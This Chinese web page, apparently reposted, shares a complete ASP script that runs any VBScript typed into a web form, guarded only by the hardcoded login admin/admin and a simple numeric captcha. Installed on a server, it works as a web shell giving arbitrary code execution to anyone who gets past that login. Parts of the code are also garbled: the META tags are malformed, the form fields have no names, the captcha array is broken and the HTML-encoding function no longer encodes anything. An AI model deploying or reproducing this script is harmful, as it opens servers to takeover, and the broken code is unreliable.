编写一个asp代码执行器

网络整理 - 07-26

保存为runasp.asp运行。账号密码admin,登陆后输入代码就可执行了!!

<% @ LANGUAGE="VBscript" %>
<%Option Explicit
response.buffer=true
dim Spassword,SUserName
    SUserName="admin"
    Spassword="admin"
dim SQLMutiStr
dim i
dim action
    action=request.querystring("action")

IF action="GetCode" then '---------TOT
    NumCodeJS
ELSE '--------TOT
    Response.Write("<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.0 Transitional//EN"">")
    Response.Write("<HTML>")
    Response.Write("<HEAD>")
    Response.Write("<TITLE>ASP RunCode SCR V1.0 / Create By PaintBlue.Net V37</TITLE>")
    Response.Write("<METAGenerator"" CONTENT=""EditPlus,V37,PaintBlue.Net"">")
    Response.Write("<METAAuthor"" CONTENT=""V37,PaintBlue.Net"">")
    Response.Write("<METAKeywords"" CONTENT=""PaintBlue.Net,,V37,RunCode,ASP,script,BlueIdea.COM,Lfgbox.com"">")
    Response.Write("<METADescription"" CONTENT=""运行ASP代码的ASP脚本!"">")
    Response.Write("</HEAD>")
    Response.Write("<BODY bgcolor=#D4D0C8>")

    SQLMutiStr=trim(Request.Form("SQLMutiStr"))
    if session("login")="" and action="chkpass" then
        session("login")=checkPass()
    end if
    if action="exit" then session("login")=""
    if session("login")="1" then
            if action="RunCode" then 
                if SQLMutiStr="" then
                    Response.write "没有输入要运行的代码!"
                    Response.write "<br><br><a href=""javascript:window.history.back();"">返回运行页面</a><br><br>"
                    Response.write "<a href=""?action=exit"">退出登陆</a>"
                    response.end
                else
                    dim ExeStrArr
                    dim re
                    dim tempSQL,tempSQL2
                        dim scriptArr,scriptSubArr
                        tempSQL2=""
                    tempSQL=split(SQLMutiStr,vbcrlf)
                    if inStr(lcase(tempSQL(0)),"language")>0 then
                        tempSQL2=tempSQL(1)
                        if ubound(tempSQL)>1 then
                            for i=1 to ubound(tempSQL)
                                tempSQL2=tempSQL2&tempSQL(i)
                            next
                        end if
                        tempSQL2=trim(tempSQL2)
                    else
                        tempSQL2=SQLMutiStr
                    end if
                        tempSQL2=replace(tempSQL2,"<%"&"=","<"&"%response.write ")
                        do
                            tempSQL2=replace(tempSQL2,vbcrlf&vbcrlf,vbcrlf)
                        loop while instr(tempSQL2,vbcrlf&vbcrlf)>0
                            tempSQL2=trim(tempSQL2)
                            tempSQL2="<"&"%%"&">"&tempSQL2&"<"&"%%"&">"
                            scriptArr=split(tempSQL2,"%"&">")
                        dim ub,kub
                            ub=ubound(scriptArr)
                        for i=0 to ub-1
                            scriptSubArr=split(scriptArr(i),"<"&"%")
                            if i>0 then response.write (scriptSubArr(0))
                            ExeCuteIt(scriptSubArr(1))
                        next
                    call EndProc("<font color=#009900>代码运行完毕!</font>")
                end if
            else
                %>
                输入要运行的ASP代码:
                <FORM METHOD=POST ACTION="?action=RunCode">
                <TEXTAREA wrap='OFF' ROWS="20"><%=Server.Htmlencode(SQLMutiStr)%></TEXTAREA>
                <br>
                <INPUT TYPE="button" Value="LouOut">
                <INPUT TYPE="reset" Value="Clear">
                <INPUT TYPE="submit" value="Run AspCode">
                </FORM>
        <%    end if
    else
        call loginmain()
    end if
        Response.write ("</BODY></HTML>")
END IF '-------TOT

SUB loginMain()
    %>

        <FORM METHOD=POST ACTION="?action=chkpass"> UserName:<INPUT TYPE="text"><br>
         PassWord:<INPUT TYPE="password"><br>
        CheckCode:<INPUT TYPE="GetCode"><img src="runasp.asp?action=GetCode&Time=<%=timer()%>"><br>
        <br><img width=125 height=0><INPUT TYPE="submit" value=" Login "></FORM>
    <%   
End SUB

function checkPass()
    dim UserName,Runpassword,GetCode
    dim errinfo
    checkPass=""
    UserName=trim(request.form("UserName"))
    Runpassword=trim(request.form("Runpassword"))
    GetCode=request.form("GetCode")
    if UserName="" or Runpassword="" then
        errinfo=errinfo&"<li>用户名和密码输入不能为空"
    end if
    if Not isnumeric(GetCode) then
        errinfo=errinfo&"<li>请输入数字校验码"
    end if
    if errinfo<>"" then
        call loginmain()       
        EndProc errinfo
    end if
    if action="chkpass" and Session("GetCode")=int(GetCode) and UserName=SUserName and Runpassword=Spassword then
        Session("GetCode")=0
        checkPass="1"
    else
        call loginmain()
        EndProc "登陆失败!请重新确认正确输入"
    end if
End function

SUB    ExeCuteIt(ExString)
    on error resume next
    Execute(ExString)
    if err.number<>0 then
        Response.write "<divbackground-color: #ffeedd;padding: 6px;"">"
        Response.write "<hr size=1>"
        Response.write "出错信息:<li><font color=#ff0000>"&err.description&"</font>"
        Response.write "<hr size=1>"
        Response.write "出错代码:<li><font color=#0000ff>"&Htmlencode(ExString)&"</font>"
        Response.write "<hr size=1></div>"
    end if
    on error goto 0
end SUB

function HTMLEncode(reString)
    dim Str:Str=reString
    if not isnull(Str) then
        Str = replace(Str, ">", ">")
        Str = replace(Str, "<", "<")
        Str = Replace(Str, CHR(32), " ")
        Str = Replace(Str, CHR(9), "    ")
        Str = Replace(Str, CHR(34), """)    ' "
        Str = Replace(Str, CHR(39), "'")    ' '
        Str = Replace(Str, CHR(13), "")
        Str = Replace(Str, CHR(10) & CHR(10), "</P><P> ")
        Str = Replace(Str, CHR(10), "<BR> ")
        HTMLEncode = Str
    else
        HTMLEncode=""
    end if
end function

'断点调试 num=0 中断
Sub Response_write(str,num)
    dim istr:istr=str
    dim inum:inum=num
    response.write str&"<br>"
    if inum=0 then response.end
end sub

SUB EndProc(info)
    Response.write "<hr size=1 color=#00aa00>"
    Response.write info
    Response.write "<hr size=1 color=#00aa00><a href=""javascript:window.history.back();"">返回运行页面</a><br><br>"
    Response.write "<a href=""?action=exit"">退出登陆</a>"
    response.end
End SUB   
%>
<script language="Jscript" runat="Server">
function GetNO(num){
        var NumArray=[
                ]["0","0","0","3c","66","66","66","66","66","66","66","66","3c","0","0","0"],
                ["0","0","0","30","38","30","30","30","30","30","30","30","30","0","0","0"],
                ["0","0","0","3c","66","60","60","30","18","c","6","6","7e","0","0","0"],
                ["0","0","0","3c","66","60","60","38","60","60","60","66","3c","0","0","0"],
                ["0","0","0","30","30","38","38","34","34","32","7e","30","78","0","0","0"],
                ["0","0","0","7e","6","6","6","3e","60","60","60","66","3c","0","0","0"],
                ["0","0","0","38","c","6","6","3e","66","66","66","66","3c","0","0","0"],
                ["0","0","0","7e","66","60","60","30","30","18","18","c","c","0","0","0"],
                ["0","0","0","3c","66","66","66","3c","66","66","66","66","3c","0","0","0"],
                ["0","0","0","3c","66","66","66","66","7c","60","60","30","1c","0","0","0"]
                ];
        var str=[];
        num=String(num).split("");
        for(var i=0;i<NumArray[0].length;i++)
                for(var j=0;j<num.length;j++)
                        str[str.length]=("0x"+NumArray[num[j]][i]);
        var str1="#define counter_width "+j*8;
        var str2="#define counter_height 16";
        return str1+String.fromCharCode(13,10)+str2+String.fromCharCode(13,10)+"static unsigned char counter_bits[]={"+str+"}";
        }
function GetRnd(Num){
        return Math.floor(Math.random()*Math.pow(10,Num));
        }
function NumCodeJS()
    {
    Response.buffer=true
    var zNum;
    var zNum=GetRnd(4);
    if (zNum<1000) zNum+=999;
    Session("GetCode") = zNum;
    Response.ContentType="image/x-xbitmap";
    Session("GetCode") = zNum;
    Response.Write(GetNO(zNum));
    }
</script>